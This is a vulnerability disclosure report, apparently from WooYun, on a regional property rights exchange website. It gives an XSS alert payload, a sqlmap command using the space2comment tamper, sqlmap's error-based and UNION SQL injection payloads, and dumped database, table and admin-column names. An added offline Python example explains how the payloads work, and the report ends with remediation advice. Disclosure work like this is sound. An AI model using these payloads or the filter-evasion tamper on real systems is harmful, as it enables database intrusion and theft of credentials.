2015-12-16: Details sent to the vendor, awaiting vendor response
2015-12-18: Vendor confirmed; details disclosed to the vendor only
2015-12-28: Details disclosed to core white hats and domain experts
2016-01-07: Details disclosed to regular white hats
2016-01-17: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public
The Inner Mongolia Property Rights Exchange Center site has SQL injection, XSS and unauthenticated browsing of sensitive directories. I also found that the site has already been getshelled by someone else (see the last image).
1. XSS: the search box on the homepage http://**.**.**.** reflects the input unescaped; entering ><script>alert("1")</script>< pops the alert.
2. Sensitive directory browsing (directory listing is enabled)
3. Absolute server path disclosure
4. SQL injection:
Injection point: http://**.**.**.**/newsfb/symore.asp?cid=1735&did=&id=0&kyly=&lxid=&sjid=&snr=&sxz=&vcd=0&xldid=1
The application blocks the space character, so the sqlmap command is built with the space2comment tamper script (each space becomes /**/, which T-SQL treats as whitespace):
sqlmap.py -u "http://**.**.**.**/newsfb/symore.asp?cid=1735&did=&id=0&kyly=&lxid=&sjid=&snr=&sxz=&vcd=0&xldid=1" --tamper "space2comment"
Vulnerable parameter reported by sqlmap:
Parameter: xldid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: cid=1735&did=&id=0&kyly=&lxid=&sjid=&snr=&sxz=&vcd=0&xldid=1 AND 6674=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6674=6674) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(118)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 32 columns
    Payload: cid=1735&did=&id=0&kyly=&lxid=&sjid=&snr=&sxz=&vcd=0&xldid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(98)+CHAR(106)+CHAR(113)+CHAR(104)+CHAR(115)+CHAR(70)+CHAR(77)+CHAR(77)+CHAR(72)+CHAR(103)+CHAR(104)+CHAR(84)+CHAR(106)+CHAR(113)+CHAR(90)+CHAR(78)+CHAR(68)+CHAR(106)+CHAR(73)+CHAR(77)+CHAR(73)+CHAR(74)+CHAR(83)+CHAR(110)+CHAR(66)+CHAR(78)+CHAR(74)+CHAR(86)+CHAR(72)+CHAR(73)+CHAR(115)+CHAR(85)+CHAR(82)+CHAR(114)+CHAR(113)+CHAR(106)+CHAR(110)+CHAR(88)+CHAR(114)+CHAR(65)+CHAR(101)+CHAR(79)+CHAR(74)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
Database names:
available databases [7]:
[*] master
[*] model
[*] msdb
[*] nmcqjy_com
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Table names:
Database: nmcqjy_com
[26 tables]
+---------------------+
| D99_CMD             |
| D99_Tmp             |
| admin               |
| class               |
| content             |
| dx_data             |
| fzlb                |
| hyzc                |
| info                |
| kjtjsq              |
| lyb                 |
| n_tab01             |
| n_tab02             |
| n_tab03             |
| n_tab04             |
| pangolin_test_table |
| rscmm               |
| tab01               |
| tab02               |
| tab03               |
| tab04               |
| tab05               |
| tab06               |
| tab07               |
| tab08               |
| tab09               |
+---------------------+
The D99_CMD, D99_Tmp and pangolin_test_table tables are the kind of leftovers that automated injection tools create, which is consistent with the earlier compromise noted further down.
Columns of the admin table:
Database: nmcqjy_com
Table: admin
[11 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| bmjf        | int      |
| bmpd        | int      |
| dwbm        | nvarchar |
| dwmc        | nvarchar |
| flag        | int      |
| id          | int      |
| LastLoginIP | nvarchar |
| nwwebid     | int      |
| password    | nvarchar |
| username    | nvarchar |
| wzjsp       | int      |
+-------------+----------+
The injection testing stops here.
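The following is an added example, not part of the original report, showing what the two sqlmap payloads above actually do and why the space2comment tamper defeats a filter that only rejects the space character. It runs entirely offline: the SQL Server error 245 text is a constructed sample of the real wording, the marker strings are decoded from the report's own CHAR() sequences, and the function names (decode_char_concat, space2comment, run_error_based_probe) are this example's own.

```python
"""Added example (not from the original WooYun report): mechanics of the
error-based MSSQL payload and of the space2comment tamper.

No request is sent anywhere. The SQL Server error message below is a
constructed sample of the real error 245 wording.
"""
import re

CHAR_RE = re.compile(r"CHAR\((\d+)\)")


def decode_char_concat(expr: str) -> str:
    """Turn `CHAR(113)+CHAR(122)+...` into the string it builds.

    sqlmap emits its boundary markers this way so the payload needs no
    quote characters; decoding them shows what the server actually sees.
    """
    return "".join(chr(int(n)) for n in CHAR_RE.findall(expr))


def space2comment(payload: str) -> str:
    """Replace every space outside string literals with an inline comment.

    This mirrors the idea behind sqlmap's space2comment tamper: T-SQL treats
    `/**/` as whitespace, so `1/**/AND/**/1=1` parses like `1 AND 1=1`,
    while a filter that only blocks the space character lets it through.
    """
    out = []
    in_single = in_double = False
    for ch in payload:
        if ch == "'" and not in_double:
            in_single = not in_single
        elif ch == '"' and not in_single:
            in_double = not in_double
        if ch == " " and not (in_single or in_double):
            out.append("/**/")
        else:
            out.append(ch)
    return "".join(out)


def naive_space_filter_blocks(value: str) -> bool:
    """The kind of check the target appears to use: reject any space."""
    return " " in value


def mssql_convert_int_error(value: str):
    """Simulate CONVERT(INT, value) on SQL Server.

    A numeric string converts cleanly and the query runs normally; anything
    else raises error 245, whose message echoes the offending value. That
    echo is the channel the error-based payload reads data through.
    """
    if re.fullmatch(r"-?\d+", value):
        return None
    # Constructed sample of SQL Server's error 245 message text.
    return ("Conversion failed when converting the nvarchar value "
            f"'{value}' to data type int.")


def extract_between_markers(error_text: str, prefix: str, suffix: str):
    """Pull the smuggled value out of the error message, as sqlmap does."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_text)
    return m.group(1) if m else None


# Marker strings exactly as they appear in the report's error-based payload.
PREFIX = decode_char_concat("CHAR(113)+CHAR(122)+CHAR(98)+CHAR(106)+CHAR(113)")
SUFFIX = decode_char_concat("CHAR(113)+CHAR(118)+CHAR(98)+CHAR(118)+CHAR(113)")


def run_error_based_probe(condition_true: bool):
    """Reproduce the logic of `AND 6674=CONVERT(INT,(SELECT prefix+
    (CASE WHEN cond THEN '1' ELSE '0' END)+suffix))` and read the answer
    back out of the simulated error message. Returns '1' or '0'."""
    smuggled = PREFIX + ("1" if condition_true else "0") + SUFFIX
    err = mssql_convert_int_error(smuggled)
    return extract_between_markers(err, PREFIX, SUFFIX)


if __name__ == "__main__":
    original = "1 AND 6674=CONVERT(INT,(SELECT 'a b'))"
    tampered = space2comment(original)
    print("markers:", PREFIX, SUFFIX)
    print("tampered:", tampered, "| blocked by space filter:",
          naive_space_filter_blocks(tampered))
    print("probe(6674=6674):", run_error_based_probe(6674 == 6674))
```

The probe returns '1' for a true condition and '0' for a false one, which is exactly how sqlmap confirms the error-based channel before swapping the CASE expression for a real subquery. A space blacklist is not a defence here; the fix is a parameterised query for xldid (and the other parameters) so that no attacker-controlled text is ever parsed as SQL.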
Proof of injection:
I was only testing, and as I was wrapping up I found this (someone else's): http://**.**.**.**/fmzcczpt/inc/bin.asp
It has clearly been compromised for a long time; I hope the site administrators do a thorough, complete cleanup. After all, a property rights exchange has a wide impact.
Filter the input, lock down directory browsing permissions, and audit the whole site thoroughly!
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-12-18 10:38
CNVD has confirmed and reproduced the described vulnerability and has passed it to CNCERT, which forwarded it to the Inner Mongolia branch to coordinate remediation with the unit that operates the site.
None yet